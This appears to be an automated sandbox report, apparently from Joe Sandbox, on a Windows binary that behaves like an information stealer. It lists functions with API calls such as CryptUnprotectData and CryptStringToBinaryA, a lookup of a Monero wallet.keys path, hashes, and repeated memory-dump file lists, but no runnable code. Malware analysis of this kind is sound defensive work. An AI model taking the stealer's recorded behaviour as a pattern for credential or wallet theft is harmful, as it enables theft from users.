                              • Instruction ID: 5165df751a61220cba98f65e4f9ce58bde0231a9bc8c1c1e8de714a6be2a347f
                              • Opcode Fuzzy Hash: 0ae0fc4edc70621f6728c693af43edcf90085a85da1995ba4caaa25f616dc388
                              • Instruction Fuzzy Hash: B9110370200209EFDB04CF64EC89FAA37A9AF89306F109449FD2A9F250DB75E845DB60
                              Function 00149AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00144EEE,00000000,00000000), ref: 00149AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,00144EEE,00000000,?), ref: 00149B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00144EEE,00000000,00000000), ref: 00149B2A
                              • LocalFree.KERNEL32(?,?,?,?,00144EEE,00000000,?), ref: 00149B3F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              • Opcode ID: 6ce30fa4dce8d465b4bcf59631f2c87b789ced444f287e90decc742d06733a8f
                              • Instruction ID: a0628accc3632cfc88300547c98ae1f63ea4495c3fe8e0cac615d876e7c76f53
                              • Opcode Fuzzy Hash: 6ce30fa4dce8d465b4bcf59631f2c87b789ced444f287e90decc742d06733a8f
                              • Instruction Fuzzy Hash: 3B11A4B4240308AFEB11CF64DC95FAA77B9FB89700F208099FA159B390C775A901CB50
                              Function 00157A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00DDE0C8,00000000,?,00160E10,00000000,?,00000000,00000000), ref: 00157A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00157A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00DDE0C8,00000000,?,00160E10,00000000,?,00000000,00000000,?), ref: 00157A7D
                              • wsprintfA.USER32 ref: 00157AB7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              • Opcode ID: c40620b0f8ff26323a711287fe0e9a8dacfc5aba49a6ffe016946294e019af43
                              • Instruction ID: 7296af058ade2061b771fd83d022e02fd77e516c282f533a30eb3d9c409fb659
                              • Opcode Fuzzy Hash: c40620b0f8ff26323a711287fe0e9a8dacfc5aba49a6ffe016946294e019af43
                              • Instruction Fuzzy Hash: 51118EB1945618EFEB208B54DC4AFAABBB8FB04721F1047DAEA1A972C0D7741A44CF51
                              Function 005075DD Relevance: 6.0, Strings: 4, Instructions: 992COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 5O${}3$7\o$Ef
                              • API String ID: 0-1699171516
                              • Opcode ID: e78f54f9c168bf5a4321568b7c9f8f85fbb33f39190377716a2c64ff6c83c67b
                              • Instruction ID: c2b36d0ef3bafb46b6628e3c4d80bfe3513a06bd560cc5ee52cdcfdcea341614
                              • Opcode Fuzzy Hash: e78f54f9c168bf5a4321568b7c9f8f85fbb33f39190377716a2c64ff6c83c67b
                              • Instruction Fuzzy Hash: E852F6F360C604AFE304AE29EC4577AFBE9EBD4320F1A853DE6C4C7744E93598058696
                              Function 0050DA95 Relevance: 5.4, Strings: 3, Instructions: 1621COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 6Ny$Xht$zT9
                              • API String ID: 0-1739400583
                              • Opcode ID: 342f780841e057a41bb44af43aa1e7b94a668798ba55007a56b531dcf8ec8606
                              • Instruction ID: cfe400d9e92d084a29ca456d9c732f8f2c92517b2b3df68930894eabd317aa91
                              • Opcode Fuzzy Hash: 342f780841e057a41bb44af43aa1e7b94a668798ba55007a56b531dcf8ec8606
                              • Instruction Fuzzy Hash: 5EB2F9F360C204AFE3046E2DEC8577ABBE9EF94720F1A4A3DEAC4C7744E63558058656
                              Function 0050A65E Relevance: 5.1, Strings: 3, Instructions: 1358COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: cF?w$jqk/$yMS:
                              • API String ID: 0-271534656
                              • Opcode ID: 85b0758ceaa7d0b279d58b572652118ed5f23b390df95dd14dc372ddd18a0cfe
                              • Instruction ID: c94341761f176f8478ef1bab084e322c4251cca44d722e335e5cd1118ca05726
                              • Opcode Fuzzy Hash: 85b0758ceaa7d0b279d58b572652118ed5f23b390df95dd14dc372ddd18a0cfe
                              • Instruction Fuzzy Hash: 8C92E3F35082049FE704AF29EC8567AFBE9EF94320F1A492DEAC4C3744EA3558458797
                              Function 00153720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                              Download Yara Rule
                              APIs
                              • CoCreateInstance.COMBASE(0015E118,00000000,00000001,0015E108,00000000), ref: 00153758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 001537B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: 2851760cdf953276c82ddeec72de7d493c598eab1c3ef5c91be2a569a56733d1
                              • Instruction ID: fed379fd15085cc0d57c269e73b21c3b3d396b8e98f4a90b3ae7dee6b2aed31d
                              • Opcode Fuzzy Hash: 2851760cdf953276c82ddeec72de7d493c598eab1c3ef5c91be2a569a56733d1
                              • Instruction Fuzzy Hash: 4241EA71A40A18DFDB24DB58CC95B9BB7B5BB48702F4042D8E618EB2D0D7716E85CF50
                              Function 00149B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00149B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00149BA3
                              • LocalFree.KERNEL32(?), ref: 00149BD3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: 47664ddb3dd477cb48ada2e143309abe7fb4c9fad6dde8eafa73e2df0b771a8a
                              • Instruction ID: 03df24514931694ec3be72815ddc08f8e450b5b8d9e079accb5d87996b1abca1
                              • Opcode Fuzzy Hash: 47664ddb3dd477cb48ada2e143309abe7fb4c9fad6dde8eafa73e2df0b771a8a
                              • Instruction Fuzzy Hash: A011BAB4A00209DFDB05DFA4D985EAE77B9FF88300F104599E91597350D774AE11CF61
                              Function 0050F4BD Relevance: 4.1, Strings: 2, Instructions: 1575COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: J'pY$$<%
                              • API String ID: 0-4009180616
                              • Opcode ID: 1aa50ea712617aefa15169daaabcbec5fd60e989c06d21d4c9c8e05615a5e1a8
                              • Instruction ID: 0983f02d9acbd4ead7a50aa476e446c0f879f603768492390cd4efa0e77cdcbd
                              • Opcode Fuzzy Hash: 1aa50ea712617aefa15169daaabcbec5fd60e989c06d21d4c9c8e05615a5e1a8
                              • Instruction Fuzzy Hash: 85B2F4F360C2049FE304AE2DEC8567AFBE9EB94320F16493DEAC5C3744EA3558458697
                              Function 00517922 Relevance: 4.0, Strings: 2, Instructions: 1542COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: \0{_$zwC
                              • API String ID: 0-2872698686
                              • Opcode ID: 33fcda14685dc79a5add6a12b8d6e497985e0d802811d47ea8a63b170c1cf5eb
                              • Instruction ID: 8123aeca861525af0781375487f911c2222aefb3c792a62e80e49c22a953e980
                              • Opcode Fuzzy Hash: 33fcda14685dc79a5add6a12b8d6e497985e0d802811d47ea8a63b170c1cf5eb
                              • Instruction Fuzzy Hash: B3B2E4F3A0C6009FE704AE29EC8567AFBE9EF94720F16893DE6C4C3744E63558458693
                              Function 0051469D Relevance: 3.9, Strings: 2, Instructions: 1373COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 3~-$;M~
                              • API String ID: 0-3991053826
                              • Opcode ID: 955a981fbb44f7923c2281397cf47c3e458776e616277cfc3d43de412f5dacef
                              • Instruction ID: 0e496297a42bf0eafb6b818fca6bb148eb509cb528472e4aab507730cb09d501
                              • Opcode Fuzzy Hash: 955a981fbb44f7923c2281397cf47c3e458776e616277cfc3d43de412f5dacef
                              • Instruction Fuzzy Hash: 4692D5F360C6009FE304AE2DEC8567ABBE9EFD4720F16893DE6C4C7744EA3558418696
                              Function 00511898 Relevance: 3.4, Strings: 2, Instructions: 921COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: Ht'$/jy
                              • API String ID: 0-1789625261
                              • Opcode ID: adf2c5f9044d9ca187d1528a640e52d4a69d68cb719235b374ba6571ef04a788
                              • Instruction ID: 0b5464aedf9dfce5c877e9af5f8517eb19810f702a3af9b34af9ce1d0a2f79f5
                              • Opcode Fuzzy Hash: adf2c5f9044d9ca187d1528a640e52d4a69d68cb719235b374ba6571ef04a788
                              • Instruction Fuzzy Hash: 565218F3A0C204AFD3046E2DDC8567BBBE9EBD4620F1A463DEAC4C3744E67558058697
                              Function 0014F68A Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 0015A920: lstrcpy.KERNEL32(00000000,?), ref: 0015A972
                                • Part of subcall function 0015A920: lstrcat.KERNEL32(00000000), ref: 0015A982
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001615B8,00160D96), ref: 0014F71E
                              • StrCmpCA.SHLWAPI(?,001615BC), ref: 0014F76F
                              • StrCmpCA.SHLWAPI(?,001615C0), ref: 0014F785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0014FAB1
                              • FindClose.KERNEL32(000000FF), ref: 0014FAC3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
